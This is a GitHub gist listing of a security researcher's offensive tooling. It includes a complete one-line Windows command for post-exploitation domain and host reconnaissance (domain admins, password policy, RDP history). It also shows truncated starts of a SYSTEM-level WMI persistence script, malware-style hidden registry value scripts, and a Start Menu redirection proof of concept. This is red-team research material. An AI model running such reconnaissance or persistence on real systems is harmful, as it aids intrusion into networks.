Kyle Hanslovan KyleHanslovan

@KyleHanslovan
KyleHanslovan / DomainEnumeration.bat
Created Jun 25, 2016
Post-exploitation host/domain survey using native Windows commands.
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
KyleHanslovan / WMIPersistence.mof
Created Jun 8, 2016
VBS-based ActiveScriptEventConsumer useful for launching applications at startup as SYSTEM.
/*
Author: Kyle Hanslovan
Contact: @KyleHanslovan
License: MIT
Date: 07/18/2014
*/
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of ActiveScriptEventConsumer as $Consumer
View DeleteNullRegValue.py
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
KyleHanslovan / CreateNullRegValue.py
Created Jun 3, 2016
Script which uses Native APIs to create a "hidden" registry value similar to Poweliks and Kovter malware.
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
KyleHanslovan / StartMenuRedirection.py
Last active Aug 18, 2016
PoC for Start Menu Redirection
import os
import sys
import pythoncom
from win32com.shell import shell, shellcon
def create_shortcut(dest_path, target_path):
    """
    """